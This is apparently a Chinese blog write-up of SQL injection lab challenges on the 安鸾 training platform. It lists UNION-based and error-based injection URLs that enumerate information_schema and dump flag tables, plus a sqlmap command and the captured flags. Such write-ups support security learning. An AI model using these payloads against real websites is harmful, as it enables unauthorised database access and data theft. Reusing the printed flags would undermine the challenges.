安鸾SQL系列之搜索型注入
涂寐 Lv5

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
本文首发于 涂寐’s Blogs:https://0xtlu.github.io/

0x01 供给材料

1
2
3
题目URL:http://47.103.94.191:8015/login.php

提示:flag仍然在数据库里面!

0x02 低难度

注:此处该注意的是select 1,2,3,4,5,6,7中哪个位置的参数可以输出前端。
flag:flag{86b757e867b43d16050225ab516b2274}

1
2
3
4
5
6
7
8
http://47.103.94.191:8015/sqli_1.php?title=1%27 or 1=1%23&action=search
http://47.103.94.191:8015/sqli_1.php?title=1%27order by 8%23&action=search
http://47.103.94.191:8015/sqli_1.php?title=1%27union select 1,2,3,4,5,6,7%23&action=search
http://47.103.94.191:8015/sqli_1.php?title=1%27union select 1,version(),user(),database(),5,6,7%23&action=search
http://47.103.94.191:8015/sqli_1.php?title=1%27union select 1,version(),user(),database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()),6,7%23&action=search
http://47.103.94.191:8015/sqli_1.php?title=1%27union select 1,version(),user(),database(),(select group_concat(column_name) from information_schema.columns where table_name = 'this_flag'),6,7%23&action=search
http://47.103.94.191:8015/sqli_1.php?title=1%27union select 1,version(),user(),database(),(select group_concat(flag) from this_flag),6,7%23&action=search
http://47.103.94.191:8015/sqli_1.php?title=1%27union select 1,version(),user(),database(),(select flag from this_flag limit 1,1),6,7%23&action=search

image

0x02 其他难度

等我学艺归来再尝试……

0x03 SQL数字型GET注入02

供给信息

1
2
3
题目URL:http://47.103.94.191:8034/

提示:flag在数据库里

文章查看

注:随便点一篇文章,整个单引号直接报错;一样需要比对能输出前端的可控参数,为union后语句能显示,需致id为负数以腾出前端显示位置;采用模糊搜索**like %flag%**能得到flag所在库名表名字段名等,但基本在当前数据库,且字段为flag。
flag:**flag{16aeb3e6d73689bf456c5c50f2d04b84} **

1
2
3
4
5
6
7
8
9
http://47.103.94.191:8034/show.php?id=35'
http://47.103.94.191:8034/show.php?id=35 order by 16
http://47.103.94.191:8034/show.php?id=-35 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
http://47.103.94.191:8034/show.php?id=-35 union select 1,2,user(),4,5,6,7,8,9,10,version(),database(),13,14,15
http://47.103.94.191:8034/show.php?id=-35 union select 1,2,user(),4,5,6,7,8,9,10,version(),(select count(table_name) from information_schema.columns where table_schema = database()),13,14,15
http://47.103.94.191:8034/show.php?id=-35 union select 1,2,user(),4,5,6,7,8,9,10,version(),(select group_concat(table_name) from information_schema.columns where column_name like '%flag%'),13,14,15
http://47.103.94.191:8034/show.php?id=-35 union select 1,2,user(),4,5,6,7,8,9,10,version(),(select group_concat(table_schema) from information_schema.columns where table_name = 'this_is_flag'),13,14,15
http://47.103.94.191:8034/show.php?id=-35 union select 1,2,user(),4,5,6,7,8,9,10,version(),(select group_concat(column_name) from information_schema.columns where table_name = 'this_is_flag'),13,14,15
http://47.103.94.191:8034/show.php?id=-35 union select 1,2,user(),4,5,6,7,8,9,10,version(),(select group_concat(flag) from this_is_flag),13,14,15

image

搜索栏

刚开始也是写入单引号,光顾着看返回:搜索关键字:wordpress',加之背景色影响,还真没注意报错回显。一番操作,不报错前提下仅返回搜索框中输入内容,看样子是转成字符串后回显前端,所以整报错注入

1
2
3
http://47.103.94.191:8034/search.php?keywords=1'&button=%E6%90%9C%E7%B4%A2
http://47.103.94.191:8034/search.php?keywords=1' order by 15-- -&button=%E6%90%9C%E7%B4%A2
http://47.103.94.191:8034/search.php?keywords=1' union SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,EXP(~(SELECT DATABASE()))-- -&button=%E6%90%9C%E7%B4%A2
1
sqlmap -u 'http://47.103.94.191:8034/search.php?keywords=1&button=%E6%90%9C%E7%B4%A2'  -v 1 --dbs
 评论